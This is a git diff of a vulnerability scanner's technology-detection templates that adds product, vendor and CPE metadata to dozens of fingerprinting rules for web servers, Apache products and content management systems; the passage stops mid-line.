b/http/technologies/apache/apache-cocoon-detect.yaml @@ -9,8 +9,12 @@ info: max-request: 1 shodan-query: http.html:"Apache Cocoon" fofa-query: app="APACHE-Cocoon" + product: cocoon + vendor: apache tags: apache,cocoon,tech + classification: + cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/apache-dubbo-detect.yaml b/http/technologies/apache/apache-dubbo-detect.yaml index abc3adf65b..bf2190dd5c 100644 --- a/http/technologies/apache/apache-dubbo-detect.yaml +++ b/http/technologies/apache/apache-dubbo-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="APACHE-dubbo" + product: dubbo + vendor: apache tags: apache,dubbo,tech + classification: + cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/apache-karaf-panel.yaml b/http/technologies/apache/apache-karaf-panel.yaml index 367f6dd2ce..106ae8c27a 100644 --- a/http/technologies/apache/apache-karaf-panel.yaml +++ b/http/technologies/apache/apache-karaf-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: realm="karaf" + product: karaf + vendor: apache tags: tech,apache,karaf + classification: + cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/apache-ofbiz-detect.yaml b/http/technologies/apache/apache-ofbiz-detect.yaml index 934dce72d3..3ccf78bbe3 100644 --- a/http/technologies/apache/apache-ofbiz-detect.yaml +++ b/http/technologies/apache/apache-ofbiz-detect.yaml @@ -1,35 +1,39 @@ -id: apache-ofbiz-detect - -info: - name: Apache OFBiz - Detect - author: rxerium - severity: info - description: | - An Apache OFBiz instance was detected. - metadata: - max-request: 1 - verified: true - fofa-query: app="Apache_OFBiz" - tags: tech,detect,ofbiz,apache - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: response - words: - - "OFBiz.Visitor=" - - "Apache OFBiz." - condition: or - - - type: status - status: +id: apache-ofbiz-detect + +info: + name: Apache OFBiz - Detect + author: rxerium + severity: info + description: | + An Apache OFBiz instance was detected. + metadata: + max-request: 1 + verified: true + fofa-query: app="Apache_OFBiz" + product: ofbiz + vendor: apache + tags: tech,detect,ofbiz,apache + + classification: + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: response + words: + - "OFBiz.Visitor=" + - "Apache OFBiz." + condition: or + + - type: status + status: - 200 -# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/apache/apache-streampipes-detect.yaml b/http/technologies/apache/apache-streampipes-detect.yaml index 3a7cfa68a8..1974ae46c5 100644 --- a/http/technologies/apache/apache-streampipes-detect.yaml +++ b/http/technologies/apache/apache-streampipes-detect.yaml @@ -1,40 +1,44 @@ -id: apache-streampipes-detect - -info: - name: Apache StreamPipes - Detect - author: Alessandro Albani - DEVisions - severity: info - description: | - Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. - metadata: - max-request: 3 - verified: true - shodan-query: title:"apache streampipes" - fofa-query: title="apache streampipes" - tags: tech,apache,streampipes,detect - -http: - - method: GET - path: - - '{{BaseURL}}/streampipes-backend/api/openapi.json' - - '{{BaseURL}}/assets/img/favicon/favicon.ico' - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - - matchers: - - type: dsl - dsl: - - contains_any(to_lower(body), "apache streampipes", "apache streampipes api") - - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body))) - condition: or - - extractors: - - type: json - part: body - group: 1 - json: +id: apache-streampipes-detect + +info: + name: Apache StreamPipes - Detect + author: Alessandro Albani - DEVisions + severity: info + description: | + Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. + metadata: + max-request: 3 + verified: true + shodan-query: title:"apache streampipes" + fofa-query: title="apache streampipes" + product: streampipes + vendor: apache + tags: tech,apache,streampipes,detect + + classification: + cpe: cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - '{{BaseURL}}/streampipes-backend/api/openapi.json' + - '{{BaseURL}}/assets/img/favicon/favicon.ico' + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - contains_any(to_lower(body), "<title>apache streampipes", "apache streampipes api") + - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body))) + condition: or + + extractors: + - type: json + part: body + group: 1 + json: - '.info.version' -# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/apache/apache-tapestry-detect.yaml b/http/technologies/apache/apache-tapestry-detect.yaml index 48eede8c46..9260cad651 100644 --- a/http/technologies/apache/apache-tapestry-detect.yaml +++ b/http/technologies/apache/apache-tapestry-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="APACHE-Tapestry" + product: tapestry + vendor: apache tags: apache,tapestry,tech + classification: + cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/apache-zeppelin-detect.yaml b/http/technologies/apache/apache-zeppelin-detect.yaml index dd64a6b61f..119d24914e 100644 --- a/http/technologies/apache/apache-zeppelin-detect.yaml +++ b/http/technologies/apache/apache-zeppelin-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="APACHE-Zeppelin" + product: zeppelin + vendor: apache tags: apache,zeppelin,tech + classification: + cpe: cpe:2.3:a:apache:zeppelin:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/default-apache-test-all.yaml b/http/technologies/apache/default-apache-test-all.yaml index 66fa6a759e..decf00e308 100644 --- a/http/technologies/apache/default-apache-test-all.yaml +++ b/http/technologies/apache/default-apache-test-all.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + product: http_server + vendor: apache tags: tech,apache + classification: + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/default-apache-test-page.yaml b/http/technologies/apache/default-apache-test-page.yaml index 268acbeed0..f9fdc9ae28 100644 --- a/http/technologies/apache/default-apache-test-page.yaml +++ b/http/technologies/apache/default-apache-test-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" + product: http_server + vendor: apache tags: tech,apache + classification: + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/default-apache2-page.yaml b/http/technologies/apache/default-apache2-page.yaml index 2aa462ac02..537a73eccf 100644 --- a/http/technologies/apache/default-apache2-page.yaml +++ b/http/technologies/apache/default-apache2-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Apache2 Debian Default Page:" + product: http_server + vendor: apache tags: tech,apache + classification: + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/ranger-detection.yaml b/http/technologies/apache/ranger-detection.yaml index e14f4d6621..c68fd1fcfa 100644 --- a/http/technologies/apache/ranger-detection.yaml +++ b/http/technologies/apache/ranger-detection.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 2 shodan-query: http.title:"Ranger - Sign In" + product: ranger + vendor: apache tags: tech,apache,ranger + classification: + cpe: cpe:2.3:a:apache:ranger:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/xampp-default-page.yaml b/http/technologies/apache/xampp-default-page.yaml index 30f3d06f34..bc4c9bc794 100644 --- a/http/technologies/apache/xampp-default-page.yaml +++ b/http/technologies/apache/xampp-default-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"XAMPP" + product: xampp + vendor: apachefriends tags: tech,php,xampp,apache + classification: + cpe: cpe:2.3:a:apachefriends:xampp:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/appcms-detect.yaml b/http/technologies/appcms-detect.yaml index 0e8a6fb38d..87432ac4fe 100644 --- a/http/technologies/appcms-detect.yaml +++ b/http/technologies/appcms-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.html:"Powerd by AppCMS" + product: appcms + vendor: appcms tags: tech,appcms + classification: + cpe: cpe:2.3:a:appcms:appcms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/autobahn-python-detect.yaml b/http/technologies/autobahn-python-detect.yaml index 5697bfc546..1cc2c24c59 100644 --- a/http/technologies/autobahn-python-detect.yaml +++ b/http/technologies/autobahn-python-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: "AutobahnPython" + product: autobahn + vendor: crossbar tags: tech,webserver + classification: + cpe: cpe:2.3:a:crossbar:autobahn:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/avideo-detect.yaml b/http/technologies/avideo-detect.yaml index 2f299a1fd5..8aca9952e5 100644 --- a/http/technologies/avideo-detect.yaml +++ b/http/technologies/avideo-detect.yaml @@ -9,8 +9,12 @@ info: max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" + product: avideo + vendor: wwbn tags: tech,avideo + classification: + cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/b2b-builder-detect.yaml b/http/technologies/b2b-builder-detect.yaml index 1932c28e53..f4c634db03 100644 --- a/http/technologies/b2b-builder-detect.yaml +++ b/http/technologies/b2b-builder-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="B2BBuilder" + product: b2b_script + vendor: itechscripts tags: b2bbuilder,tech + classification: + cpe: cpe:2.3:a:itechscripts:b2b_script:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/bamboo-detect.yaml b/http/technologies/bamboo-detect.yaml index b4cf9aa185..26d0671e6b 100644 --- a/http/technologies/bamboo-detect.yaml +++ b/http/technologies/bamboo-detect.yaml @@ -12,8 +12,11 @@ info: vendor: atlassian shodan-query: http.favicon.hash:-1379982221 category: devops + product: bamboo tags: tech,bamboo,atlassian,detect,cicd + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +35,4 @@ http: group: 1 regex: - '(?i)atlassian bamboo</a> version (.*) -' -# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/bigbluebutton-detect.yaml b/http/technologies/bigbluebutton-detect.yaml index 2a62d9cd24..5149cf1409 100644 --- a/http/technologies/bigbluebutton-detect.yaml +++ b/http/technologies/bigbluebutton-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"BigBlueButton" + product: bigbluebutton + vendor: bigbluebutton tags: tech,bigbluebutton + classification: + cpe: cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/bigip-apm-detect.yaml b/http/technologies/bigip-apm-detect.yaml index 1ac91d24c2..fc0b213b85 100644 --- a/http/technologies/bigip-apm-detect.yaml +++ b/http/technologies/bigip-apm-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: html:"BIG-IP APM" + product: big-ip_access_policy_manager + vendor: f5 tags: bigip,tech,f5,detect + classification: + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index bbc722cf0f..2793d18021 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -12,10 +12,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:boa:boa:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "Server: Boa/" + product: boa + vendor: boa tags: boa,tech http: @@ -35,4 +38,4 @@ http: part: header kval: - Server -# digest: 490a0046304402202a45b52e578317f8965b3218167ea6f362a161e3ed98fefecbfeaaa2e89c675f02206b2c6c1ebe181ea4ae0b9cb785c87469ec83eb9b1df2f45bcb13ed52c33c46a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a45b52e578317f8965b3218167ea6f362a161e3ed98fefecbfeaaa2e89c675f02206b2c6c1ebe181ea4ae0b9cb785c87469ec83eb9b1df2f45bcb13ed52c33c46a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml index c63c2ce4f1..fe4d8e7efb 100644 --- a/http/technologies/burp-collaborator-detect.yaml +++ b/http/technologies/burp-collaborator-detect.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:portswigger:burp_suite:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "Server: Burp Collaborator" + product: burp_suite + vendor: portswigger tags: burp,tech,detect http: diff --git a/http/technologies/casaos-detection.yaml b/http/technologies/casaos-detection.yaml index a4cd8658c9..b783015182 100644 --- a/http/technologies/casaos-detection.yaml +++ b/http/technologies/casaos-detection.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: http.html:"/CasaOS-UI/public/index.html" fofa-query: body="/CasaOS-UI/public/index.html" + product: casaos + vendor: icewhale tags: casaos,tech,oss + classification: + cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/checkpoint-mobile-detect.yaml b/http/technologies/checkpoint-mobile-detect.yaml index 2019f75869..dc31d73f8b 100644 --- a/http/technologies/checkpoint-mobile-detect.yaml +++ b/http/technologies/checkpoint-mobile-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"Check Point Mobile" + product: mobile_access_portal_agent + vendor: checkpoint tags: panel,checkpoint,detect + classification: + cpe: cpe:2.3:a:checkpoint:mobile_access_portal_agent:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/chevereto-detect.yaml b/http/technologies/chevereto-detect.yaml index 58c806d34a..56a8aeb450 100644 --- a/http/technologies/chevereto-detect.yaml +++ b/http/technologies/chevereto-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Centreon" + product: chevereto + vendor: chevereto tags: tech,chevereto + classification: + cpe: cpe:2.3:a:chevereto:chevereto:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/citrix-hypervisor-page.yaml b/http/technologies/citrix-hypervisor-page.yaml index e2da99ff1b..eb14c6f599 100644 --- a/http/technologies/citrix-hypervisor-page.yaml +++ b/http/technologies/citrix-hypervisor-page.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Welcome to Citrix Hypervisor" + product: hypervisor + vendor: citrix tags: tech,citrix,default-page + classification: + cpe: cpe:2.3:o:citrix:hypervisor:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml index 096465a313..5ea6e0b03d 100644 --- a/http/technologies/citrix-xenmobile-version.yaml +++ b/http/technologies/citrix-xenmobile-version.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: "title:\"XenMobile - Console\"" + product: xenmobile_server + vendor: citrix tags: tech,edb,citrix,version,detect + classification: + cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: @@ -49,4 +53,4 @@ http: group: 1 regex: - 'v=([^"]+)' -# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/connectwise-control-detect.yaml b/http/technologies/connectwise-control-detect.yaml index 1c30ec9bd2..37c8c9cc08 100644 --- a/http/technologies/connectwise-control-detect.yaml +++ b/http/technologies/connectwise-control-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title="ConnectWise Control Remote Support Software" + product: control + vendor: connectwise tags: tech,connectwise + classification: + cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/couchbase-sync-gateway.yaml b/http/technologies/couchbase-sync-gateway.yaml index 22a88c108c..605a41bca5 100644 --- a/http/technologies/couchbase-sync-gateway.yaml +++ b/http/technologies/couchbase-sync-gateway.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: html:"Couchbase Sync Gateway" + product: sync_gateway + vendor: couchbase tags: tech,couchbase + classification: + cpe: cpe:2.3:a:couchbase:sync_gateway:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index 0823d1fb7c..d1281aefae 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -1,5 +1,5 @@ -id: craftercms-detect - +id: craftercms-detect + info: name: CrafterCMS - Detect author: righettod @@ -12,25 +12,29 @@ info: verified: true max-request: 1 shodan-query: http.title:"craftercms" + product: crafter_cms + vendor: craftercms tags: tech,craftercms,detect -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - 'CrafterCMS' - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:craftercms:crafter_cms:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: header + words: + - 'CrafterCMS' + + extractors: + - type: regex + part: body + group: 1 + regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' -# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/cvsweb-detect.yaml b/http/technologies/cvsweb-detect.yaml index 3a94bf7c33..9625f9eaf2 100644 --- a/http/technologies/cvsweb-detect.yaml +++ b/http/technologies/cvsweb-detect.yaml @@ -14,8 +14,12 @@ info: shodan-query: title:"cvsweb" fofa-query: title="cvsweb" zoomeye-query: title:cvsweb + product: cvsweb + vendor: freebsd tags: tech,cvsweb,detect + classification: + cpe: cpe:2.3:a:freebsd:cvsweb:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/dash-panel-detect.yaml b/http/technologies/dash-panel-detect.yaml index 693b1260f9..10ceca67b9 100644 --- a/http/technologies/dash-panel-detect.yaml +++ b/http/technologies/dash-panel-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"DashRenderer" + product: dash_core + vendor: dash tags: tech,dash + classification: + cpe: cpe:2.3:a:dash:dash_core:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/dedecms-detect.yaml b/http/technologies/dedecms-detect.yaml index 306d937e77..aa51d9a71a 100644 --- a/http/technologies/dedecms-detect.yaml +++ b/http/technologies/dedecms-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 shodan-query: title:"dedecms" || http.html:"power by dedecms" + product: dedecms + vendor: dedecms tags: dedecms,tech + classification: + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-apache-shiro.yaml b/http/technologies/default-apache-shiro.yaml index 259a94706c..cd23f7f24e 100644 --- a/http/technologies/default-apache-shiro.yaml +++ b/http/technologies/default-apache-shiro.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Shiro Quickstart" + product: shiro + vendor: apache tags: tech,apache,shiro + classification: + cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-cakephp-page.yaml b/http/technologies/default-cakephp-page.yaml index 19435121b5..1ae6dc709e 100644 --- a/http/technologies/default-cakephp-page.yaml +++ b/http/technologies/default-cakephp-page.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to CakePHP" + product: cakephp + vendor: cakephp tags: tech,cakephp,default-page + classification: + cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-codeigniter-page.yaml b/http/technologies/default-codeigniter-page.yaml index 03415da1ef..fdff67ed7b 100644 --- a/http/technologies/default-codeigniter-page.yaml +++ b/http/technologies/default-codeigniter-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to CodeIgniter" + product: codeigniter + vendor: codeigniter tags: tech,codeigniter + classification: + cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-django-page.yaml b/http/technologies/default-django-page.yaml index c471eebc93..6218f685ba 100644 --- a/http/technologies/default-django-page.yaml +++ b/http/technologies/default-django-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"The install worked successfully! Congratulations!" + product: django + vendor: djangoproject tags: tech,django + classification: + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-fastcgi-page.yaml b/http/technologies/default-fastcgi-page.yaml index bbfcd663c1..3253bcd23e 100644 --- a/http/technologies/default-fastcgi-page.yaml +++ b/http/technologies/default-fastcgi-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"FastCGI" + product: fcgi + vendor: fastcgi tags: tech,fastcgi + classification: + cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-fedora-page.yaml b/http/technologies/default-fedora-page.yaml index 07ecac5017..d77cfeadbc 100644 --- a/http/technologies/default-fedora-page.yaml +++ b/http/technologies/default-fedora-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Test Page for the HTTP Server on Fedora" + product: fedora + vendor: fedoraproject tags: tech,fedora + classification: + cpe: cpe:2.3:o:fedoraproject:fedora:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-glassfish-server-page.yaml b/http/technologies/default-glassfish-server-page.yaml index 0c384cbc07..853900b5e5 100644 --- a/http/technologies/default-glassfish-server-page.yaml +++ b/http/technologies/default-glassfish-server-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"GlassFish Server - Server Running" + product: glassfish_server + vendor: oracle tags: tech,glassfish + classification: + cpe: cpe:2.3:a:oracle:glassfish_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: group: 1 regex: - 'GlassFish\s+Server\s+([A-Za-z0-9\s.]+)(\n|\r)' -# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/default-jetty-page.yaml b/http/technologies/default-jetty-page.yaml index 5df2cdc2ee..7a4fe3ccac 100644 --- a/http/technologies/default-jetty-page.yaml +++ b/http/technologies/default-jetty-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Powered By Jetty" + product: jetty + vendor: eclipse tags: tech,jetty + classification: + cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-lighttpd-page.yaml b/http/technologies/default-lighttpd-page.yaml index deeb3bf63f..5018ad8e07 100644 --- a/http/technologies/default-lighttpd-page.yaml +++ b/http/technologies/default-lighttpd-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Powered by lighttpd" + product: lighttpd + vendor: lighttpd tags: tech,lighttpd + classification: + cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-lighttpd-placeholder-page.yaml b/http/technologies/default-lighttpd-placeholder-page.yaml index 8fd1aeb980..c8e84f9d3d 100644 --- a/http/technologies/default-lighttpd-placeholder-page.yaml +++ b/http/technologies/default-lighttpd-placeholder-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself" + product: lighttpd + vendor: lighttpd tags: tech,lighttpd + classification: + cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-movable-page.yaml b/http/technologies/default-movable-page.yaml index 51263b39af..9ccc875f22 100644 --- a/http/technologies/default-movable-page.yaml +++ b/http/technologies/default-movable-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: title:"Welcome to Movable Type" + product: movable_type + vendor: sixapart tags: tech,movable + classification: + cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-openresty.yaml b/http/technologies/default-openresty.yaml index 81f007e289..a092058f93 100644 --- a/http/technologies/default-openresty.yaml +++ b/http/technologies/default-openresty.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to OpenResty!" + product: openresty + vendor: openresty tags: tech,openresty + classification: + cpe: cpe:2.3:a:openresty:openresty:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-parallels-plesk.yaml b/http/technologies/default-parallels-plesk.yaml index 691e20c3e6..e14c8839d0 100644 --- a/http/technologies/default-parallels-plesk.yaml +++ b/http/technologies/default-parallels-plesk.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Default Parallels Plesk Panel Page" + product: parallels_plesk_panel + vendor: parallels tags: tech,default-page,parallels,plesk + classification: + cpe: cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-payara-server-page.yaml b/http/technologies/default-payara-server-page.yaml index 8d5f2afd3a..2ed4b84138 100644 --- a/http/technologies/default-payara-server-page.yaml +++ b/http/technologies/default-payara-server-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Payara Server - Server Running" + product: payara + vendor: payara tags: tech,payara + classification: + cpe: 